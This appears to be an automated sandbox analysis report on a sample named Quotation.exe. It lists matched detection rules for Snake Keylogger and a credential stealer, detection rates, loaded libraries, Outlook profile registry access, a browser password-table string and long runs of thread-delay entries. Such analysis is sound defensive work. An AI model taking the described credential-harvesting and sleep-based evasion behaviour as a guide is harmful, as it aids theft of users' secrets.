                          Source: Quotation.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Quotation.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: Quotation.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Quotation.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Quotation.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Quotation.exe, ---.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                          Source: C:\Users\user\Desktop\Quotation.exeMutant created: NULL
                          Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Quotation.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002C43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Quotation.exeReversingLabs: Detection: 71%
                          Source: Quotation.exeVirustotal: Detection: 70%
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C29C30 push esp; retf 00C9h0_2_00C29D55
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2BDA5 pushfd ; iretd 0_2_00C2BDAA
                          Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599641Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599419Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599063Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598953Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598844Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598719Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594613Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 1167Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 8647Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 5908Thread sleep count: 1167 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 5908Thread sleep count: 8647 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep count: 32 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599641s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599419s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599313s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599188s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -599063s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598953s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598844s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598719s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -598110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -597110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -596110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594613s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -594110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exe TID: 6724Thread sleep time: -593985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599641Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599419Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 599063Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598953Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598844Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598719Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 598110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595610Jump to behavior
